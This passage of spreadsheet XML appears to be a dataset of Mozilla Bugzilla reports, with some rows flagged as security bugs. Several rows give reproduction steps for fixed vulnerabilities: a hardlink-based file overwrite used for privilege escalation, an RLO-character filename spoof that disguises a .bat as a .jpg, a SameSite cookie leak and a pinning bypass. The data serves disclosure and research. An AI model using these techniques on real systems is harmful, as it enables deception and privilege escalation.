      <c r="B3497" t="inlineStr">
        <is>
          <t>2012-11-12 12:47:41 -0800</t>
        </is>
      </c>
      <c r="C3497" t="inlineStr">
        <is>
          <t>merge day changes for bug 773120 - turn off 10.5 tests for mozilla-release</t>
        </is>
      </c>
      <c r="D3497" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E3497" t="n">
        <v>1</v>
      </c>
      <c r="F3497" t="n">
        <v>1</v>
      </c>
      <c r="G3497" t="n">
        <v>5</v>
      </c>
      <c r="H3497" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3497" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3497" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3497" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3497" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3497" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3497" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3497" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3497" t="inlineStr"/>
      <c r="Q3497" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3497" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3497" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3497" t="n">
        <v>1</v>
      </c>
      <c r="U3497" t="n">
        <v>0</v>
      </c>
      <c r="V3497" t="n">
        <v>9</v>
      </c>
      <c r="W3497" t="inlineStr">
        <is>
          <t>I will attach the patches in here.</t>
        </is>
      </c>
      <c r="X3497" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3498">
      <c r="A3498" t="n">
        <v>1066190</v>
      </c>
      <c r="B3498" t="inlineStr">
        <is>
          <t>2014-09-11 10:39:03 -0700</t>
        </is>
      </c>
      <c r="C3498" t="inlineStr">
        <is>
          <t>if an unknown issuer error is encountered before pinning checks are done, pinning checks never happen</t>
        </is>
      </c>
      <c r="D3498" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:01 -0700</t>
        </is>
      </c>
      <c r="E3498" t="n">
        <v>1</v>
      </c>
      <c r="F3498" t="n">
        <v>1</v>
      </c>
      <c r="G3498" t="n">
        <v>3</v>
      </c>
      <c r="H3498" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3498" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3498" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K3498" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3498" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3498" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3498" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3498" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3498" t="inlineStr">
        <is>
          <t>[adv-main33+]</t>
        </is>
      </c>
      <c r="Q3498" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3498" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3498" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T3498" t="n">
        <v>1</v>
      </c>
      <c r="U3498" t="n">
        <v>0</v>
      </c>
      <c r="V3498" t="n">
        <v>16</v>
      </c>
      <c r="W3498" t="inlineStr">
        <is>
          <t>If a certificate's issuer can't be found, IsChainValid never gets called, which is where we do our pinning checks. As a result, a user can be presented with an overridable error on a site that should be pinned (i.e. we should display a pinning error and not allow an override).
STR:
1. run an https server with a self-signed cert
2. use /etc/hosts to redirect pinningtest.appspot.com to localhost
3. set pinning enforcement to "strict" (2)
4. visit https://pinningtest.appspot.com
expected results: pinning error page, not overridable
actual results: unknown issuer page, overridable</t>
        </is>
      </c>
      <c r="X3498" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3499">
      <c r="A3499" t="n">
        <v>56442</v>
      </c>
      <c r="B3499" t="inlineStr">
        <is>
          <t>2000-10-13 08:48:34 -0700</t>
        </is>
      </c>
      <c r="C3499" t="inlineStr">
        <is>
          <t>Incorrect builtin loadable root cert module nssckbi32.dll on Windows</t>
        </is>
      </c>
      <c r="D3499" t="inlineStr">
        <is>
          <t>2000-10-13 18:38:58 -0700</t>
        </is>
      </c>
      <c r="E3499" t="n">
        <v>1</v>
      </c>
      <c r="F3499" t="n">
        <v>1</v>
      </c>
      <c r="G3499" t="n">
        <v>3</v>
      </c>
      <c r="H3499" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3499" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3499" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3499" t="inlineStr">
        <is>
          <t>3.1</t>
        </is>
      </c>
      <c r="L3499" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3499" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N3499" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3499" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3499" t="inlineStr"/>
      <c r="Q3499" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3499" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3499" t="inlineStr">
        <is>
          <t>3.1</t>
        </is>
      </c>
      <c r="T3499" t="n">
        <v>1</v>
      </c>
      <c r="U3499" t="n">
        <v>0</v>
      </c>
      <c r="V3499" t="n">
        <v>4</v>
      </c>
      <c r="W3499" t="inlineStr">
        <is>
          <t>The builtin loadable root cert module nssckbi32.dll
has several serious problems on Windows.
1. lib/pk11wrap looks for the name "nssckbi.dll",
   not "nssckbi32.dll".
2. nssckbi32.dll's entry point C_GetFunctionList is
   not DLL exported, so lib/pk11wrap cannot find that
   symbol in the DLL.
3. The definition of struct CK_FUNCTION_LIST in
   nssckepv.h doesn't have the pack pragma, so it
   does not conform to the packing requirement of
   pkcs11.h.
I will attach a patch that makes it work on Windows,
but the patch is just a proof of concept.  It needs
more work before it can be checked in.</t>
        </is>
      </c>
      <c r="X3499" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3500">
      <c r="A3500" t="n">
        <v>794426</v>
      </c>
      <c r="B3500" t="inlineStr">
        <is>
          <t>2012-09-26 04:57:14 -0700</t>
        </is>
      </c>
      <c r="C3500" t="inlineStr">
        <is>
          <t>Simultaneous calls to nsBuiltinDecoderStateMachine::StopAudioThread() cause problems</t>
        </is>
      </c>
      <c r="D3500" t="inlineStr">
        <is>
          <t>2015-10-16 11:39:07 -0700</t>
        </is>
      </c>
      <c r="E3500" t="n">
        <v>1</v>
      </c>
      <c r="F3500" t="n">
        <v>1</v>
      </c>
      <c r="G3500" t="n">
        <v>3</v>
      </c>
      <c r="H3500" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3500" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3500" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K3500" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3500" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3500" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3500" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3500" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3500" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q3500" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3500" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3500" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T3500" t="n">
        <v>1</v>
      </c>
      <c r="U3500" t="n">
        <v>0</v>
      </c>
      <c r="V3500" t="n">
        <v>15</v>
      </c>
      <c r="W3500" t="inlineStr">
        <is>
          <t>Our code assumes that after the state machine thread has called StopAudioThread(), the audio thread is stopped. There is a situation where this is not true:
-- SetAudioCaptured gets called on the main thread, calling StopAudioThread from the main thread
-- main-thread StopAudioThread calls Shutdown() on the audio thread, and waits for it to shut down
-- meanwhile nsBuiltinDecoderStateMachine calls StopAudioThread()
-- state machine thread StopAudioThread calls Shutdown() on the audio thread, and returns immediately with an error because a thread can only be shut down by a single other thread
-- state machine thread carries on and cleans up stuff the audio thread is using --&gt; crash</t>
        </is>
      </c>
      <c r="X3500" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3501">
      <c r="A3501" t="n">
        <v>887921</v>
      </c>
      <c r="B3501" t="inlineStr">
        <is>
          <t>2013-06-27 11:27:28 -0700</t>
        </is>
      </c>
      <c r="C3501" t="inlineStr">
        <is>
          <t>Assertion failure: InSequentialOrExclusiveParallelSection(), at gc/Heap.h</t>
        </is>
      </c>
      <c r="D3501" t="inlineStr">
        <is>
          <t>2015-02-25 20:16:46 -0800</t>
        </is>
      </c>
      <c r="E3501" t="n">
        <v>1</v>
      </c>
      <c r="F3501" t="n">
        <v>1</v>
      </c>
      <c r="G3501" t="n">
        <v>3</v>
      </c>
      <c r="H3501" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3501" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3501" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3501" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3501" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3501" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3501" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3501" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3501" t="inlineStr">
        <is>
          <t>[jsbugmon:update]</t>
        </is>
      </c>
      <c r="Q3501" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3501" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3501" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T3501" t="n">
        <v>1</v>
      </c>
      <c r="U3501" t="n">
        <v>0</v>
      </c>
      <c r="V3501" t="n">
        <v>7</v>
      </c>
      <c r="W3501" t="inlineStr">
        <is>
          <t>Created attachment 768467
stack
gc();
m0 = new WeakMap;
m0.toSource = (function() {
    p1 = new ParallelArray([16289], function() {});
});
uneval(this);
Object.defineProperty(this, "o0.v1", {
    configurable: gcPreserveCode(),
});
function f0() {
    return ''
};
gcslice(182);
p1.reduce(f0);
asserts js debug shell on m-c changeset 3b955f306226 without any CLI arguments at Assertion failure: InSequentialOrExclusiveParallelSection(), at gc/Heap.h
s-s because this involves gc and bug 857094 was previously s-s. Tested with a 64-bit threadsafe js debug shell.
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   http://hg.mozilla.org/mozilla-central/rev/1aa1dc84a1a4
user:        Shu-yu Guo
date:        Thu Apr 04 08:13:22 2013 -0700
summary:     Bug 857094. (r=sstangl)</t>
        </is>
      </c>
      <c r="X3501" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3502">
      <c r="A3502" t="n">
        <v>87360</v>
      </c>
      <c r="B3502" t="inlineStr">
        <is>
          <t>2001-06-22 15:10:42 -0700</t>
        </is>
      </c>
      <c r="C3502" t="inlineStr">
        <is>
          <t>PSM manager does not work on https sites</t>
        </is>
      </c>
      <c r="D3502" t="inlineStr">
        <is>
          <t>2001-07-05 09:49:42 -0700</t>
        </is>
      </c>
      <c r="E3502" t="n">
        <v>1</v>
      </c>
      <c r="F3502" t="n">
        <v>1</v>
      </c>
      <c r="G3502" t="n">
        <v>3</v>
      </c>
      <c r="H3502" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3502" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3502" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3502" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3502" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3502" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3502" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3502" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3502" t="inlineStr">
        <is>
          <t>critical for 0.9.2, ready to checkin</t>
        </is>
      </c>
      <c r="Q3502" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3502" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3502" t="inlineStr">
        <is>
          <t>mozilla0.9.2</t>
        </is>
      </c>
      <c r="T3502" t="n">
        <v>1</v>
      </c>
      <c r="U3502" t="n">
        <v>0</v>
      </c>
      <c r="V3502" t="n">
        <v>36</v>
      </c>
      <c r="W3502" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:0.9.1+) Gecko/20010622
BuildID:    2001062204
PSM no longer pops up to ask if you want to store a password, and sites that
have previously remembered passwords no longer fill in the form fields
Reproducible: Always
Steps to Reproduce:
1. go to any site with a login/password you have previously saved
2. PSM does not fill in fields
Also
1. Go to site where you have not saved password and manually fill them in.
2. PSM does not ask if you want to rememeber the password.
Actual Results:  PSM does not fill in fields, does not ask if you want to
remember passwords
Expected Results:  PSM uses previously saved passwords or asks for use of new ones
I have marked this as critical as data is lost ie, saved passwords are not
longer available from PSM</t>
        </is>
      </c>
      <c r="X3502" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3503">
      <c r="A3503" t="n">
        <v>1469916</v>
      </c>
      <c r="B3503" t="inlineStr">
        <is>
          <t>2018-06-20 09:43:58 -0700</t>
        </is>
      </c>
      <c r="C3503" t="inlineStr">
        <is>
          <t>SameSite Cookies leakage via "Save Page As..."</t>
        </is>
      </c>
      <c r="D3503" t="inlineStr">
        <is>
          <t>2024-05-30 09:46:50 -0700</t>
        </is>
      </c>
      <c r="E3503" t="n">
        <v>1</v>
      </c>
      <c r="F3503" t="n">
        <v>1</v>
      </c>
      <c r="G3503" t="n">
        <v>3</v>
      </c>
      <c r="H3503" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3503" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3503" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K3503" t="inlineStr">
        <is>
          <t>61 Branch</t>
        </is>
      </c>
      <c r="L3503" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3503" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3503" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3503" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3503" t="inlineStr">
        <is>
          <t>[domsecurity-active][post-critsmash-triage][adv-main63+][tor 22343]</t>
        </is>
      </c>
      <c r="Q3503" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3503" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3503" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T3503" t="n">
        <v>1</v>
      </c>
      <c r="U3503" t="n">
        <v>0</v>
      </c>
      <c r="V3503" t="n">
        <v>43</v>
      </c>
      <c r="W3503" t="inlineStr">
        <is>
          <t>Created attachment 8986497
Contains php files for easier reproduction
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Steps to reproduce:
1. Download the attached file and host it locally under "save" directory
2. Make request.log world writable (i.e. chmod 666 request.log)
3. Run the following bash command to follow requests coming in;
$ tail -f request.log| sed -En '/GET|Cookie:/p'
3. Open http://localhost/save/cookies.php?url=http://127.0.0.1/save/save.php
4. Observe cookies received, only cookies with no SameSite attributes are received
5. Save the page with Ctrl+S or via Context menu &gt; Save Page As...
6. Observe received cookies, all cookies are received
Note:
Only those tags  (with external reference) in "save.php" leak cookies
Actual results:
SameSite cookies sent for crossdomain requests
Expected results:
SameSite cookies shouldn't have been sent</t>
        </is>
      </c>
      <c r="X3503" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3504">
      <c r="A3504" t="n">
        <v>1177501</v>
      </c>
      <c r="B3504" t="inlineStr">
        <is>
          <t>2015-06-25 13:19:55 -0700</t>
        </is>
      </c>
      <c r="C3504" t="inlineStr">
        <is>
          <t>MediaTimer can allow mThread to be destroyed before Dispatch unwinds</t>
        </is>
      </c>
      <c r="D3504" t="inlineStr">
        <is>
          <t>2016-07-02 10:49:29 -0700</t>
        </is>
      </c>
      <c r="E3504" t="n">
        <v>1</v>
      </c>
      <c r="F3504" t="n">
        <v>1</v>
      </c>
      <c r="G3504" t="n">
        <v>3</v>
      </c>
      <c r="H3504" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3504" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3504" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K3504" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3504" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3504" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3504" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3504" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3504" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main40+]</t>
        </is>
      </c>
      <c r="Q3504" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3504" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3504" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T3504" t="n">
        <v>1</v>
      </c>
      <c r="U3504" t="n">
        <v>0</v>
      </c>
      <c r="V3504" t="n">
        <v>17</v>
      </c>
      <c r="W3504" t="inlineStr">
        <is>
          <t>This is the source of the crashes I was seeing in bug 1175768.</t>
        </is>
      </c>
      <c r="X3504" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3505">
      <c r="A3505" t="n">
        <v>1246944</v>
      </c>
      <c r="B3505" t="inlineStr">
        <is>
          <t>2016-02-09 06:55:16 -0800</t>
        </is>
      </c>
      <c r="C3505" t="inlineStr">
        <is>
          <t>Arbitrary file overwrite with updater and moz maintenance service using callback application path parameter</t>
        </is>
      </c>
      <c r="D3505" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:15 -0700</t>
        </is>
      </c>
      <c r="E3505" t="n">
        <v>1</v>
      </c>
      <c r="F3505" t="n">
        <v>1</v>
      </c>
      <c r="G3505" t="n">
        <v>3</v>
      </c>
      <c r="H3505" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3505" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3505" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K3505" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3505" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3505" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3505" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3505" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3505" t="inlineStr">
        <is>
          <t>[adv-main48+]</t>
        </is>
      </c>
      <c r="Q3505" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3505" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3505" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T3505" t="n">
        <v>1</v>
      </c>
      <c r="U3505" t="n">
        <v>0</v>
      </c>
      <c r="V3505" t="n">
        <v>11</v>
      </c>
      <c r="W3505" t="inlineStr">
        <is>
          <t>Created attachment 8717450
ovr.poc.zip
During an update using the callback application path parameter a copy of an user specified file (the callback file) is made. For example for &lt;callback-file&gt; a &lt;callback-file&gt;.moz-callback is created. If the target of the copy is prepared with a locked hardlink an arbitrary file is replaced.
The poc use the CreateHardlink tool from https://github.com/google/symboliclink-testing-tools to create the hardlink without the need of write access to the target file. 
I have tested the poc with win7 and ff 47 nightly installed to C:\Program Files (x86)\Nightly\:
To reproduce
- download poc and extract the files
- download http://releases.mozilla.org/pub/firefox/nightly/latest-mozilla-central/firefox-47.0a1.en-US.win32.complete.mar and place the file to &lt;pocdir&gt;/updatework/update.mar
- execute poc.rb
The poc replace the content of the firefox.exe with the content of the cmd.exe. 
This can be easily used to elevate privileges.</t>
        </is>
      </c>
      <c r="X3505" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3506">
      <c r="A3506" t="n">
        <v>742852</v>
      </c>
      <c r="B3506" t="inlineStr">
        <is>
          <t>2012-04-05 12:50:33 -0700</t>
        </is>
      </c>
      <c r="C3506" t="inlineStr">
        <is>
          <t>Security information link in releases.mozilla.org README is incorrect</t>
        </is>
      </c>
      <c r="D3506" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3506" t="n">
        <v>1</v>
      </c>
      <c r="F3506" t="n">
        <v>1</v>
      </c>
      <c r="G3506" t="n">
        <v>5</v>
      </c>
      <c r="H3506" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3506" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3506" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3506" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3506" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3506" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3506" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3506" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3506" t="inlineStr">
        <is>
          <t>[documentation]</t>
        </is>
      </c>
      <c r="Q3506" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3506" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3506" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3506" t="n">
        <v>1</v>
      </c>
      <c r="U3506" t="n">
        <v>0</v>
      </c>
      <c r="V3506" t="n">
        <v>4</v>
      </c>
      <c r="W3506" t="inlineStr">
        <is>
          <t>http://releases.mozilla.org/pub/mozilla.org/firefox/releases/README
points to the wrong place.
The correct link for security advisories is 
http://www.mozilla.org/security/known-vulnerabilities/
---
I set this bug to MAJOR to make sure it gets addressed. 
If that causes problems, you're welcome to reset it's severity.</t>
        </is>
      </c>
      <c r="X3506" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3507">
      <c r="A3507" t="n">
        <v>1262140</v>
      </c>
      <c r="B3507" t="inlineStr">
        <is>
          <t>2016-04-05 06:56:20 -0700</t>
        </is>
      </c>
      <c r="C3507" t="inlineStr">
        <is>
          <t>Update Re:dash to latest version</t>
        </is>
      </c>
      <c r="D3507" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E3507" t="n">
        <v>1</v>
      </c>
      <c r="F3507" t="n">
        <v>1</v>
      </c>
      <c r="G3507" t="n">
        <v>6</v>
      </c>
      <c r="H3507" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3507" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J3507" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K3507" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3507" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3507" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3507" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3507" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3507" t="inlineStr">
        <is>
          <t>[SvcOps]</t>
        </is>
      </c>
      <c r="Q3507" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3507" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3507" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3507" t="n">
        <v>1</v>
      </c>
      <c r="U3507" t="n">
        <v>0</v>
      </c>
      <c r="V3507" t="n">
        <v>3</v>
      </c>
      <c r="W3507" t="inlineStr">
        <is>
          <t>A newer version (0.9.2) of Re:dash is out and fixes a few issues we have found. It also adds full support for using the Pivot Table as a real visualization. This will help me drop support of my custom dashboard for UI Telemetry. We can do it all in Re:dash now.</t>
        </is>
      </c>
      <c r="X3507" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3508">
      <c r="A3508" t="n">
        <v>1438025</v>
      </c>
      <c r="B3508" t="inlineStr">
        <is>
          <t>2018-02-13 14:04:54 -0800</t>
        </is>
      </c>
      <c r="C3508" t="inlineStr">
        <is>
          <t>browser.downloads.download should remove \u202E (RLO) chars</t>
        </is>
      </c>
      <c r="D3508" t="inlineStr">
        <is>
          <t>2024-05-30 09:42:52 -0700</t>
        </is>
      </c>
      <c r="E3508" t="n">
        <v>1</v>
      </c>
      <c r="F3508" t="n">
        <v>1</v>
      </c>
      <c r="G3508" t="n">
        <v>3</v>
      </c>
      <c r="H3508" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3508" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J3508" t="inlineStr">
        <is>
          <t>Untriaged</t>
        </is>
      </c>
      <c r="K3508" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L3508" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3508" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3508" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3508" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3508" t="inlineStr">
        <is>
          <t>[adv-main60+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3508" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3508" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3508" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T3508" t="n">
        <v>1</v>
      </c>
      <c r="U3508" t="n">
        <v>0</v>
      </c>
      <c r="V3508" t="n">
        <v>28</v>
      </c>
      <c r="W3508" t="inlineStr">
        <is>
          <t>Created attachment 8950753
PoC
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
Steps to reproduce:
Added "\u202E" to a filename passed to downloads.download() results in a filename spoof.
Actual results:
Downloading with filename="test\u202Egpj.bat" results in a filename appearing to be "testtab.jpg" in the downloads panel.
When attempting to open this file, the prompt that appears reminding user that this is an executable is all reversed text and illegible. 
Expected results:
Strip "\u202E"</t>
        </is>
      </c>
      <c r="X3508" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3509">
      <c r="A3509" t="n">
        <v>159328</v>
      </c>
      <c r="B3509" t="inlineStr">
        <is>
          <t>2002-07-25 03:03:18 -0700</t>
        </is>
      </c>
      <c r="C3509" t="inlineStr">
        <is>
          <t>submit button doesn't work</t>
        </is>
      </c>
      <c r="D3509" t="inlineStr">
        <is>
          <t>2020-12-09 12:56:52 -0800</t>
        </is>
      </c>
      <c r="E3509" t="n">
        <v>1</v>
      </c>
      <c r="F3509" t="n">
        <v>1</v>
      </c>
      <c r="G3509" t="n">
        <v>3</v>
      </c>
      <c r="H3509" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3509" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3509" t="inlineStr">
        <is>
